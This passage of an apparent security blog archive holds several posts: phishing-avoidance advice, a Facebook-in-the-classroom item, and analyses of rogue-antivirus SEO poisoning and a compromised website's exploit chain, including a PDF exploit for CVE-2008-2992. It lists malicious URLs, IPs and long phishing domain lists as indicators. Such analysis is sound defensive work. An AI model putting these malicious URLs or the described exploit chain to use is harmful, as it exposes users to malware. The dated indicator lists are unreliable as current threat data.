trustworthy organization. For example, an attacker may send email seemingly
from a reputable credit card company or financial institution that requests
account information, often suggesting that there is a problem. When users
respond with the requested information, attackers can use it to gain access
to the accounts.

Phishing attacks may also appear to come from other types of organizations,
such as charities. Attackers often take advantage of current events and
certain times of the year, such as
* natural disasters (e.g., Hurricane Katrina, Indonesian tsunami)
* epidemics and health scares (e.g., H1N1)
* economic concerns (e.g., IRS scams)
* major political elections
* holidays

How do you avoid being a victim?

* Be suspicious of unsolicited phone calls, visits, or email messages from
individuals asking about employees or other internal information. If an
unknown individual claims to be from a legitimate organization, try to
verify his or her identity directly with the company.
* Do not provide personal information or information about your
organization, including its structure or networks, unless you are
certain of a person's authority to have the information.
* Do not reveal personal or financial information in email, and do not
respond to email solicitations for this information. This includes
following links sent in email.
* Don't send sensitive information over the Internet before checking a
website's security (see Protecting Your Privacy for more information).
* Pay attention to the URL of a website. Malicious websites may look
identical to a legitimate site, but the URL may use a variation in
spelling or a different domain (e.g., .com vs. .net).
* If you are unsure whether an email request is legitimate, try to verify
it by contacting the company directly. Do not use contact information
provided on a website connected to the request; instead, check previous
statements for contact information. Information about known phishing
attacks is also available online from groups such as the Anti-Phishing
Working Group (http://www.antiphishing.org).
* Install and maintain anti-virus software, firewalls, and email filters
to reduce some of this traffic (see Understanding Firewalls,
Understanding Anti-Virus Software, and Reducing Spam for more
information).
* Take advantage of any anti-phishing features offered by your email
client and web browser.

What do you do if you think you are a victim?

* If you believe you might have revealed sensitive information about your
organization, report it to the appropriate people within the
organization, including network administrators. They can be alert for
any suspicious or unusual activity.
* If you believe your financial accounts may be compromised, contact your
financial institution immediately and close any accounts that may have
been compromised. Watch for any unexplainable charges to your account.
* Immediately change any passwords you might have revealed. If you used
the same password for multiple resources, make sure to change it for
each account, and do not use that password in the future.
* Watch for other signs of identity theft (see Preventing and Responding
to Identity Theft for more information).
* Consider reporting the attack to the police, and file a report with the
Federal Trade Commission (http://www.ftc.gov/).

Reference: US-CERT

100 Ways You Should Be Using Facebook in Your Classroom

Facebook is not only networking tools used to communicate with your friends, photos sharing, games and other activities. My reader sent me email regarding Facebook can be used in 100 ways for education purposes. This is such as fabulous idea, thumb up!

Reference: OnlineCollege

Facebook isn’t just a great way for you to find old friends or learn about what’s happening this weekend, it is also an incredible learning tool. Teachers can utilize Facebook for class projects, for enhancing communication, and for engaging students in a manner that might not be entirely possible in traditional classroom settings. Read on to learn how you can be using Facebook in your classroom, no matter if you are a professor, student, working online, or showing up in person for class.

Continue...

Threat Microsoft Internet Explorer (MSIE) Cross-Site-Script (XSS) In Text File

My reader from China sent me email regarding Cross-Site-Scripting (XSS) executed in IE that posted in China Security Blog recently.

IE8 one of the latest browser from Microsoft claimed offers users more protection than previous versions of the browser through a combination of new security and privacy features. Can be easily become of medium of XSS attack when most users read their text file through browser.

The XSS syntax was wrote in text format, executed successfully in browser Microsoft Internet Explorer 8 and IE 6. I don't have IE 7 installed, but I believe possibility is high and working as well in IE 7.

Text XSS PoC was tested and not working in Firefox browser and Google Chrome.

guama.txt source code:

Due to this kind of XSS can be easily executed in text file (Txt format), why still lots of users taking risks browsing using IE?

reference: www.smxiaoqiang.cn/guama.txt

Microsoft Outlook Web Access (OWA) SEO Poisoning

When most of the medias reported about the Microsoft Outlook Web Access (OWA) was spamming through emails. What I see OWA keyword become one of with SEO poisoning keyword. Search related to OWA will end to rouge av.

The rouge av have very low av detection (Virustotal 1/41)

Related domains and IP address:

IP Address: 91.213.126.150

coolstats1.net

goodstats1.net

sunstats1.net

IP Address: 85.12.24.11

top-antispyware-scan9.com

topantimalwarescan5.com

your-pc-protection1.com

IP Address: 91.205.40.5

marketcoms.cn

Spam **16-Oct-09

Spam Lists:-

IP Address: 159.226.7.162

*.sexiono.cn

*.sexvideo-thith.cn

*.tbonx.cn

*.w58.kj96.cn

*.xn--i8sw9d6z4a6xk.cn

*.xrmail4.cn

*.yu1u.cn

*.zhong268.cn

216.105jc001.cn

5j8dsand.cn

66sfx.cn

713sese.cn

85jaay5.cn

908jdla222.cn

abcrot.cn

abus3r.cn

adminfile.cn

aiaoqhfo.cn

airwaystours.mx1.abcde.cm.cn

alhesbah.cn

axa1.cn

b0san.cn

baidu-baiduxin4.cn

cn.mouldbiz.cn

de89i9.cn

durakamvezet.cn

eurosmoke.cn

famplayfit.cn

fastfreetest.cn

fffffffggggg.cn

firewalled.cn

fyukj.cn

hxg011.cn

idle.a.w-a-y.cn

ing-groupinc.cn

is.fr0zen.cn

it.databsd.cn

jeflea.cn

jiqq1.8udns2.cn

jrjcjzx.cn

jyeyq.cn

jzm011.cn

kamarket.cn

leizi888.cn

lj4sll.cn

madamhcne.cn

mail.dnsrobot.cn

mail.hsyccb.cn

mail.xn--i8sw9d6z4a6xk.cn

mail.xrmail4.cn

max-16.cn

mfjdk.cn

mndfg.cn

nikits.cn

ns2.famplayfit.cn

ns2.lerte.cn

of.mon3y.cn

oitqu.cn

ok886.8udns1.cn

pc-check.cn

pcavublo.cn

psp777.cn

qxz7.cn

regentland.cn

seek-database.cn

sex-god.cn

sex.cn

simonhongyahoo.cn

sllwrnm7.cn

sllwrnm8.cn

svc.eblyx.cn

tbsince.cn

theyourbest.cn

tsblogon.cn

tybgh.cn

una.m-i-a-u.cn

uni-vod.cn

unlock69.cn

user.comgome.cn

user1.jzm007.cn

vlokj.cn

w3og.cn

web.yu1u.cn

webcomunity.cn

www.86qq8.cn

www.ovemvuea.cn

www.cc388.cn

www.co.cn

www.pikings.cn

www.ortjntea.cn

xiaba66.cn

xmjyq.cn

xn--9kq39ivpi18g4vn.cn

xn--eqr446j.cn

xn--eqrs9hqx1a.cn

xn--fctw1yg2d65kp3l.cn

xn--fiqs8seqcu10a4h7c.cn

xn--i8sw9d6z4a6xk.cn

xn--kput3ixou56i.cn

xn--omsv2bg0yq6f.cn

xn--pss89jq4pvo0ahgi.com

xn--qev38a12kcvuqtd.cn

xn--srs561hr5ckwl.cn

xn--xfrz5mzq4avbl.cn

xn--xhq82ag8sppbr5iitgdp3d.net

xn--yrvt74bqhf.cn

xn--zqs19tzw5a.cn

ylx99.cn

yu1u.cn

zdq003.cn

zh.018e.cn

zlwrnm20.cn

a86d86.kpocepeb.cn

IP Address: 60.172.210.4

www.ganuxoc.cn

www.yurihib.cn

fb3d5f.pubehof.cn

www.yubajib.cn

www.bojosid.cn

996.fabaret.cn

085.gibazov.cn

f36.neworer.cn

IP Address: 203.93.208.86

*.bvanafiz.cn

*.cvupuqal.cn

*.gkavovom.cn

*.jxaqivuy.cn

*.rpafacuj.cn

*.trazawib.cn

08075.pquqeter.cn

0c1007.twelagip.cn

4245cb.qnahatep.cn

ns1.buildpious.com

ns1.cornreal.com

ns1.coursedo.com

ns1.dependorder.com

ns1.noticestream.com

ns1.renowncook.com

ns1.sailcalm.com

ns1.sisterspend.com

ns1.sizemay.com

ns1.smilenotice.com

ns1.wifezeal.com

ns2.classmover.com

ns2.strongmouth.com

ns2321.lamedelegation.ripn.net

ns3.ba43.com

ns3.behindmile.com

ns3.bellfrom.com

ns3.centmotivation.com

ns3.cu28.com

ns3.da39.com

ns3.decidesit.com

ns3.deserttwo.com

ns3.dimplechaste.com

ns3.fabledsolar.com

ns3.figurenoon.com

ns3.flatagain.com

ns3.grayunique.com

ns3.groundbed.com

ns3.haveover.com

ns3.hitstead.com

ns3.inventcross.com

ns3.linehumor.com

ns3.med22.org

ns3.minepush.com

ns3.monthdry.com

ns3.moverhand.com

ns3.mu77.net

ns3.northmy.com

ns3.nu23.com

ns3.ourcould.com

ns3.oversmooth.com

ns3.painteager.com

ns3.regionget.com

ns3.replytwenty.com

ns3.rowbranch.com

ns3.sharefollow.com

ns3.shoecoast.com

ns3.sightunique.com

ns3.skinglad.com

ns3.skinround.com

ns3.soweight.com

ns3.speedsuperb.com

ns3.staymoral.com

ns3.streamcrowd.com

ns3.symbolride.com

ns3.theyfull.com

ns3.thoughago.com

ns3.tiedraw.com

ns3.totalchaste.com

ns3.tubeold.com

ns3.via11.net

ns3.via22.net

ns3.via99.org

ns3.wantcover.com

ns3.washequate.com

ns3.worthyfound.com

ns4.advocacycoast.com

ns4.amresolution.com

ns4.majormoral.com

ns4.stoodsail.com

ns4.valuedflower.com

ns5.0g7.ru

ns5.appeartry.com

ns5.coateach.com

ns5.fellcause.com

ns5.putflower.com

ns6.0ck.ru

ns6.6s2.ru

www.csaduxil.cn

www.caregor.cn

www.yiqaliq.cn

www.hatusam.cn

ynakefir.cn

0ck.ru

33-99.com

amresolution.com

beginsaid.com

express-meds.com

linehumor.com

oureffect.com

repeatcrease.com

smuhelef.cn

ab8.bebocaw.cn

alison.hibakiz.cn

fc01.wzeqnepp.cn

e34.giduwuq.cn

ab93.rixofar.cn

IP Address: 218.75.149.156

www.oxdodqea.cn

blushflash.com

streetbrown.com

wwwdnsforum.com

ns2.wwwdnsforum.com

www.oiogxbea.cn

www.iidmdwue.cn

www.ibpgfbue.cn

IP Address: 61.191.188.85

www.bemegic.cn

www.yximolim.cn

www.yehiwir.cn

24032.yojokow.cn

d0c22b.xidudig.cn

03e.jepawad.cn

f15.lelibav.cn

6828.ducuhum.cn

7445ac.zudavur.cn

62c.bgomilor.cn

discipline.qojapos.cn

IP Address: 114.205.10.176

dihenioe.cn

*.bvuoavts.cn

*.chancetag.com

*.coldnew.com

*.coldtrust.com

*.linkdnssetup.com

*.movebowl.com

*.oceanmath.com

*.strongbowl.com

*.trialhuge.com

blushdisc.com

blushfish.com

blushfood.com

blushsign.com

bobhot.com

bowlblush.com

bvuoavts.cn

coldnew.com

coldtrust.com

herbalpenispill.net

linkdnssetup.com

liveblush.com

movebowl.com

ns1.bvuoavts.cn

ns1.chancetag.com

ns1.coldnew.com

ns1.coldtrust.com

ns1.movebowl.com

ns1.oceanmath.com

ns1.strongbowl.com

ns1.townstrong.com

ns2.chancetag.com

ns2.coldnew.com

ns2.movebowl.com

ns2.oceanmath.com

ns2.strongbowl.com

ns2.strongsuper.com

ns2.townstrong.com

sizedr.com

trialhuge.com

www.trialhuge.com

chancetag.com

coldtrust.com

movebowl.com

oceanmath.com

strongbowl.com

strongsuper.com

townstrong.com

IP Address: 87.242.78.57

*.by.ru

*.max-foto.info

*.wwretsapio.by.ru

45-24-03.com

admlyuban.by.ru

arcland.by.ru

atb.by.ru

awn.by.ru

bancaposte.by.ru

belgorod.by.ru

beliy-medved.by.ru

bpolbancoposta.by.ru

dreemeer.by.ru

e-zbuild.com

egroo.by.ru

elik.by.ru

em83.by.ru

forsyte.by.ru

gamerland.by.ru

goz.by.ru

grayxufyfy.by.ru

gwtw.by.ru

gym.by.ru

host.by.ru

indetails.info

itsbi.org

lag12.by.ru

localexploit.by.ru

m-tv.co.cc

mail.by.ru

mapple.by.ru

mendes.by.ru

montikor.by.ru

moscargo.com

ns3.by.ru

okus.ru

ot18.info

personals.by.ru

posteitali.by.ru

primero.by.ru

rebelde-mexico.by.ru

reklamaru.by.ru

shura.by.ru

sjc.ru

snape.by.ru

t-stan.by.ru

tenek.by.ru

tligurov.by.ru

tp.by.ru

transazia.by.ru

tuganov.by.ru

tut.by.ru

ukrokplus.by.ru

unicreditbancaitalia.by.ru

uva.ru

vof.by.ru

wwretsapio.by.ru

www.max-foto.info

i-share.by.ru

mestovstrechi.by.ru

IP Address: 66.45.237.220

*.hdfccs_bank.t35.com

*.t35.com

abaddonsheaven.t35.com

abbey1.t35.com

alfredgomx.t35.com

angelsaddiavolo.t35.com

banaameex.t35.com

banamex-empresas.t35.com

banamex-personas.t35.com

banamexboveda.t35.com

bancanet-online.t35.com

bancanetonline.t35.com

barnamex.t35.com

bl-lit.t35.com

boveda-banamex.t35.com

boveda-bancanet.t35.com

bovedabanamex.t35.com

bovedabancanet-banamex.t35.com

burn-proxy.t35.com

citisecure.t35.com

citisecures.t35.com

dandatiger.t35.com

danke.t35.com

demo.t35.com

derricklewizzz.t35.com

dubaiway.t35.com

emailyahoo.t35.com

farsa.t35.com

freechips.t35.com

gallerypic.t35.com

gautamgambhir.t35.com

gotogo.t35.com

grupo-banamex.t35.com

grupofinanciero-banamex.t35.com

halifax2008.t35.com

halifaxopen.t35.com

haliffaxex.t35.com

hdfcbanks.t35.com

hdfcbannk.t35.com

hdfccs_bank.t35.com

hdfccs_banks.t35.com

hdffc_update.t35.com

hdffc_updates.t35.com

hdffccs_bank.t35.com

hdffcs_bank.t35.com

hinter.t35.com

homefacture.t35.com

icusecolo.t35.com

intercontinentalonline.t35.com

intercontinentals.t35.com

jaredamaupdate.t35.com

kalerxy.t35.com

knownman.t35.com

lafon.t35.com

lloydsupdate.t35.com

lodger.t35.com

login-verify2.t35.com

login-verify3.t35.com

login-verify4.t35.com

makanarolling.t35.com

maman123.t35.com

metalmelt.t35.com

mmundialbw.t35.com

mylloydstsbhome.t35.com

naufork.t35.com

nertyuu.t35.com

netkey-banamex.t35.com

newvisa.t35.com

newvision.t35.com

notificacion.t35.com

notificacionbanamex.t35.com

notificacionbancanet.t35.com

notificaciones.t35.com

onlienforlresak.t35.com

online-banamex.t35.com

onlinewachovia.t35.com

patricia2.t35.com

portal-banamex.t35.com

pozaa.t35.com

qwick-fix.t35.com

rbconline.t35.com

rbconlinex.t35.com

rbscolla.t35.com

redirectluss.t35.com

registros.t35.com

sahariyani1.t35.com

sbiinternationalonline.t35.com

sbionlinelive.t35.com

scotiabank-inverlat.t35.com

scotti.t35.com

sesionesbancanetbanamex.t35.com

seviciomessenger.t35.com

sururlu.t35.com

thdao.t35.com

updatemakana.t35.com

verifiedvisa.t35.com

vjio.t35.com

wach.t35.com

wachoi.t35.com

wachoivamndfjewkjak.t35.com

wachov.t35.com

wachovia_bankingsecurity.t35.com

wachoviaaccess.t35.com

wachoviabola.t35.com

wachoviabola1.t35.com

wachoviadeola.t35.com

wachoviadssa.t35.com

wachovialook.t35.com

wachoviaonlines.t35.com

wachoviasupdates.t35.com

wachoviaupdatess.t35.com

warlexy100.t35.com

wearedone.t35.com

web951.t35.com

weter.t35.com

www.falilat.t35.com

www.hdfccs_bank.t35.com

yahooboss.t35.com

yahooidfarzad.t35.com

yahoologin00.t35.com

yahooo1508.t35.com

yooohooman.t35.com

orlando.t35.com

IP Address: 212.244.48.53

republika.d.onet.pl

*.ab_ovo.republika.pl

*.cwsunitra.republika.pl

*.kozi_m.republika.pl

*.kriso.republika.pl

*.martavicari.republika.pl

*.multipro2005.republika.pl

*.naszaszansa.republika.pl

*.republika.pl

*.translatorduo.republika.pl

ab_ovo.republika.pl

acanthus.republika.pl

analizator.republika.pl

antymobbing.republika.pl

bianar.republika.pl

brebox.republika.pl

chatek.republika.pl

cwsunitra.com

cwsunitra.republika.pl

cyfbar.republika.pl

czechupwhu.republika.pl

dariuszpod.republika.pl

dawidziuk0.republika.pl

deepurple1.republika.pl

diabetic.republika.pl

domykanadyjskie.republika.pl

edward-bialek.republika.pl

epolisa.republika.pl

fhupema.republika.pl

ftp2.republika.pl

gim1leszno.republika.pl

gmph.republika.pl

goryniakp.republika.pl

granitgranit.republika.pl

grom5.republika.pl

gwiazdka.republika.pl

hamra.republika.pl

henry130.republika.pl

jablonie.republika.pl

kaliszok.republika.pl

kangootip.com

konciel.republika.pl

kozi_m.republika.pl

kriso.republika.pl

leonzs3.republika.pl

livnew.republika.pl

lizakicukierki.republika.pl

madcraft.republika.pl

mario236.republika.pl

martavicari.republika.pl

meniere.republika.pl

mfmch.republika.pl

microft.republika.pl

miniglass.republika.pl

moduss.republika.pl

msc1.republika.pl

multipro2005.republika.pl

naszaszansa.republika.pl

netpit.republika.pl

olambik.republika.pl

pilot4.republika.pl

polfito.republika.pl

polskaferma.republika.pl

ppgen.republika.pl

ptchprie.republika.pl

pwswitch.republika.pl

raddeli.republika.pl

republika.d.onet.pl

rfq.republika.pl

serwiszegluj.republika.pl

straznikbeskidu.republika.pl

superstudent.republika.pl

swiatkanarkow.republika.pl

swrazem.republika.pl

szlifierniaamber.republika.pl

szpic.republika.pl

tmsp.republika.pl

www.ab_ovo.republika.pl

www.aborcja-pl.republika.pl

www.afurman.republika.pl

www.apt.republika.pl

www.arendarski-maciej.republika.pl

www.bokamaro.republika.pl

www.capriszon.republika.pl

www.chaos.republika.pl

www.cwsunitra.republika.pl

www.energowierzba.republika.pl

www.fakesteroids.republika.pl

www.fanatic20.republika.pl

www.isobel.republika.pl

www.klimapo.republika.pl

www.klubspp.republika.pl

www.kozi_m.republika.pl

www.kriso.republika.pl

www.lgw.republika.pl

www.martavicari.republika.pl

www.mojecharty.republika.pl

www.mojpodhalan.republika.pl

www.mukolud23.republika.pl

www.multipro2005.republika.pl

www.naszaszansa.republika.pl

www.niemcza.republika.pl

www.nieradzik.republika.pl

www.omegagranitrans.republika.pl

www.orange47.republika.pl

www.pabet2005.republika.pl

www.palabra.republika.pl

www.pfroios.republika.pl

www.pinczer.republika.pl

www.r19.republika.pl

www.sigmaradomsko.republika.pl

www.smtj.republika.pl

www.sznaucer2.republika.pl

www.taga.republika.pl

www.tipo.republika.pl

www.totalwar.republika.pl

www.translatorduo.republika.pl

www.unitel.republika.pl

www.vbscript.republika.pl

www.windykuj.republika.pl

www.zrbmardula.republika.pl

wyooo.republika.pl

zielonemity.republika.pl

IP Address: 217.74.65.162

*.deltah.w.interia.pl

*.w.interia.pl

adamlukasz.w.interia.pl

aegis.aaops.w.interia.pl

agility.w.interia.pl

agro.chmielno.w.interia.pl

agro_beskidy.w.interia.pl

aidspl.w.interia.pl

aisza.koty.w.interia.pl

akszeing.w.interia.pl

aktowka.w.interia.pl

alfa_gaz.w.interia.pl

alkohole.w.interia.pl

allianz.marzena.w.interia.pl

anatomiac.w.interia.pl

anna.wroblewska.w.interia.pl

aquanet.w.interia.pl

assembling-directx.w.interia.pl

atiradeon.w.interia.pl

bdgalinscy.w.interia.pl

bierzwnik.w.interia.pl

bioqtr.w.interia.pl

blackwh.w.interia.pl

bura4.w.interia.pl

bw2_wilu.w.interia.pl

cats-musical.w.interia.pl

cliff4.w.interia.pl

deltah.w.interia.pl

der57.w.interia.pl

derbeth.w.interia.pl

dermanovum.w.interia.pl

devrex.w.interia.pl

dex11.w.interia.pl

diabko.w.interia.pl

dompodsosnami.ustka.w.interia.pl

doom2.w.interia.pl

dorota.dubel.w.interia.pl

dsjbygucias.w.interia.pl

ekklan.w.interia.pl

eurekaostrowska.w.interia.pl

eurolas.w.interia.pl

fantasy-web.w.interia.pl

fireasses.w.interia.pl

gad.w.domu.w.interia.pl

grazynkasiak.w.interia.pl

hcastillo.w.interia.pl

hetmanszopienice.w.interia.pl

hitmanweb.w.interia.pl

ibrandt.w.interia.pl

impzachslon.w.interia.pl

intervip.w.interia.pl

j.lenczowski.w.interia.pl

jamnior.w.interia.pl

jerzy.stachurski.w.interia.pl

jjdymek.w.interia.pl

kalender.w.interia.pl

klimaks.w.interia.pl

klubsmakoszy.w.interia.pl

konkaro.w.interia.pl

kotlandia.w.interia.pl

koty.orientalne.somalijskie.w.interia.pl

ktoz.w.interia.pl

kubapg2.w.interia.pl

logokrokus1994.w.interia.pl

mafia_gc.w.interia.pl

maine.coon.w.interia.pl

malspecszkol.w.interia.pl

marcin.majkut.w.interia.pl

marcinspooky.w.interia.pl

markey.w.interia.pl

maximx86.w.interia.pl

mike.s.w.interia.pl

mikrobus.poznan.w.interia.pl

mimbase.w.interia.pl

mparlicki.w.interia.pl

mszlak.w.interia.pl

naturemed.w.interia.pl

ncaur.w.interia.pl

neverhood.cygan.w.interia.pl

nihilism.w.interia.pl

odlewnia-lubelskie.w.interia.pl

opieka-drawsko.w.interia.pl

parafia.sztum.w.interia.pl

parda.w.interia.pl

pawelsiwek.w.interia.pl

phgrecja.w.interia.pl

poradnia-sztum.w.interia.pl

progs-jp.w.interia.pl

przedszkolenr2darlowo.w.interia.pl

ptmkwroclaw.w.interia.pl

pzw-brzana.w.interia.pl

refj.w.interia.pl

rodzinqowski.w.interia.pl

rymesa.w.interia.pl

ryszard-kujawa.w.interia.pl

ryszardtoczko.w.interia.pl

rytel.w.interia.pl

samotnia_christa.w.interia.pl

skorczyl.w.interia.pl

slawik.pl.w.interia.pl

sp910066kr.w.interia.pl

std-spz.w.interia.pl

stmalga.w.interia.pl

swatclinic.w.interia.pl

sz_n.w.interia.pl

szkolabork.w.interia.pl

sztum.w.interia.pl

teatr.miniatura.w.interia.pl

thelo0p.w.interia.pl

tmkartuz.w.interia.pl

tomekzurawski.w.interia.pl

turniejzeo.w.interia.pl

u.o.i.i.w.interia.pl

ulacompensa.w.interia.pl

wosp-mysliborz.w.interia.pl

www.deltah.w.interia.pl

zbysw.w.interia.pl

ziellona.w.interia.pl

ziolaiprzyprawy.w.interia.pl

zmuzyki.w.interia.pl

zsp-czarna-woda.w.interia.pl

navyowner.w.interia.pl

Maya London Mayalondon.com Was Compromised !! -- cbx-north. bio-age.ru:8080,

While I am looking for Maya related information through Google, suddenly I was stunned with "This site may harm your computer" and it catch my attention and the website was Maya London " www.mayalondon.com";

With using Fiddler tool, I able to capture http network packets that flow between my guest systems and Web Server. The outcome was main page for "www.mayalondon.com" was injected with malicious links. Once users browsers to infected site, the user is redirecting to execute the injected script to:

- http://cbx-north.se/buttons/bothnia.php

- http://bio-age.ru:8080/index.php

and another injected linked "swfobject.js" contain two malicious links

- http://kryolan.com/images/favicon.php

- http://cbx-north.se/buttons/bothnia.php

User not only stopped with one exploit, there have another exploit chains at "http://cbx-north.se/buttons/bothnia.php" that separately load Exploit PDF and and Exploit Flash file to system. The results for malicious Flash file and PDF file exploiting this vulnerability in this attack are still very low.

- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=2 (PDF) (VT 4/41)

- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=3 (Flash) (VT 2/41)

From the script below, "bio-age.ru:8080" contains "Javascript" to perform downloading "Exploit PDF" that contain Adobe util.printf overflow exploit CVE-2008-2992.

Without surprising, Exploit PDF file received minor detection rate from VirusTotal. The attackers used heavily obfuscated Javascript combined with script fragmentation to evade detection. I have to salute attacker to give hard work for analysis.

Exploit PDF file will download malware (load.exe) from "http://youbio.ru:8080/main.php?id=5&hello21" when loaded using unpatch Adobe Reader.

Hostname "bio-age.ru:8080" and "youbio.ru:8080" pointing to same IP Address: 208.67.219.132

"cbx-north.se" -->IP Address: 195.47.247.121

Hostnames sharing same IP:

1099.se

1jma.net

addison.dk

aid-com.be

amodei.net

andersmagnusson.net

archifacts.net

arerosseland.com

arstahavsbad.net

arubalandscape.net

arvidson.dk

aspdalen.net

betinafriis.net

beyondthenorthwaves.net

bgof.net

birgit-iren.net

bogbasen.dk

bornholmerferier.dk

carloscicchelli.net

casa50.net

cbx-north.se

cdrcrd.com

clubcosmos.net

crispycat.com

cybospace.net

datavagen.com

dbs16.dk

eng-dal.net

faudo.net

ferieitoscana.net

fiberdanmark.dk

fjellhamarfk.net

footballglobe.net

fossekallen.net

fotbollstrojor.net

franzensandberg.net

frodeandersen.net

gizl.nl

glitr.net

gmprod.net

goergen.net

grandiscrew.net

gunmancentral.net

hanekam.net

haraldriise.net

hounds.dk

hsl.be

indelfa.com

innovationmarket.net

insats.net

insg.nl

instituut-waldorf.be

jeromedeperlinghi.net

jhlan.net

jkann.net

jolv.net

ka-kjing.net

kaffesukker.net

kajhelge.net

kloverblomman.net

koksijde.net

kureer.net

kvalitena.net

leeuwerke.net

leksebistand.net

lemuelbooks.net

lifeonacouch.net

lillehammerbaptist.net

loshavnsidene.net

lostinberlin.net

lyd-tekniker.net

mail2.nykroppa.se

malerimetoder.se

memorybar.net

mhastings.net

mitrapa.se

morden.dk

muzinfo.net

nittfors.net

ns2.cdrcrd.com

nykroppa.se

oehlenschlager.dk

ole-andreas.net

olethore.net

oppegaende.net

oshorisk.dk

peture.net

pilegrim.net

problematisk.net

relihq.net

rkcc.dk

roennerhavnen.dk

seules.net

sidenmin.net

sikkerhedsnettet.net

smuthullet.net

spar2design.dk

spd-mv.de

srv71.b-one.net

stromvoll.net

sunile.no

sunnydisposition.net

thaiwok.se

theien.net

theil.dk

tollerforum.net

trikster.net

trim1.net

ultra-ragnar.net

usenethelp.net

vinnpenger.net

voldesign.net

webbkampanj.net

wickedfriends.net

www.bornholmerferier.dk

www.malerimetoder.se

www.mitrapa.se

www.pirken.dk

www.sunile.no

www.thaiwok.se

xweza.com

zirconium-inc.net

IP Address: 208.67.219.132

bio-age.ru:8080

youbio.ru:8080

goowy.net

iris-germany.com

quienestadetrasdelascuarderias.org

IP Address: 78.46.45.77

*.bestensee.de

*.kryolan.com

*.omatix.de

bestensee.de

cydico.com

dermacolor-camouflage.net

gut.de

haby.net

kryolan.us

kryolan.com

linear-software.de

lwb-info.de

omatix.de

rbo-info.de

s10.omatix.de

static.77.45.46.78.clients.your-server.de

www.bestensee.de

www.kryolan.de

www.omatix.de

P/S: The Webmaster for "www.mayalondon.com" suspend their website for maintenance to clean up "malicious" codes.

Analysis De-Obfuscate Malicious Exploit PDF File

Client exploitation with PDF file continuing be one of the famous client attack vector. This happen especially when targeting Zero-Day Adobe 9.13 version.

Below is the screenshot when JavaScript viewable after unpacked using self-build tool.

The whole JavaScript content were copied and paste in Malzilla Decoder to De-obfuscate the

Javascript. However, the JavaScript were protected with another second layer encryption. To determine final intent of the shellcode, I have to remove another obfuscation layer that attempts to evade from detection.

Occurrence of the substring "\" replace with "%" can convert the string back into readable binary.

Finally the code converted to readable mode. However, seem there still have some shellcode downloading malware after exploit unpatched Adobe.

The final layer De-obfuscated using "UCS" method to reveal the malicious download link.

The exploit PDF file gain poor detection rate after submitted to Virustotal. Only 4/41 detection available for this PDF file.

Malicious link "domensm.cn" (59.125.231.252)

Hostname sharing same IP address:

awamujirapa.com

crash-cxim.cn

cxim-way.cn

domenpoxuj.cn

domensm.cn

google-update-checker.cn

idkfa.cn

kenstwistedminde.com

kloumixooon.cn

mail.adobe-updating-service.cn

mail.awamujirapa.com

mail.cxim-way.cn

mail.cximnik.cn

mail.domenpoxuj.cn

mail.eg4110.com

mail.idkfa.cn

mail.kloumixooon.cn

mail.olokedu.com

mail.sashahost.cn

mail.usrvnu.ru

mail.usrvzi.ru

mail.wesssrett.cn

mail.xewyny.ru

muzzon837.cn

mydearmishima.com

myspeedstrip.com

ns1.eg4110.com

ns2.eg4110.com

ola-la.cn

olokedu.com

peezero.net

pi-samba.com

pumigamez.com

sashahost.cn

seekasonghere.com

shkens.net

theslytube.com

tubepornsearchonline.com

usrvzi.ru

wesssrett.cn

www.adwarcontrol.cn

www.idkfa.cn

www.kloumixooon.cn

www.mydearmishima.com

www.shkens.net

www.tubepornsearchonline.com

www.usrvzi.ru

xewyny.ru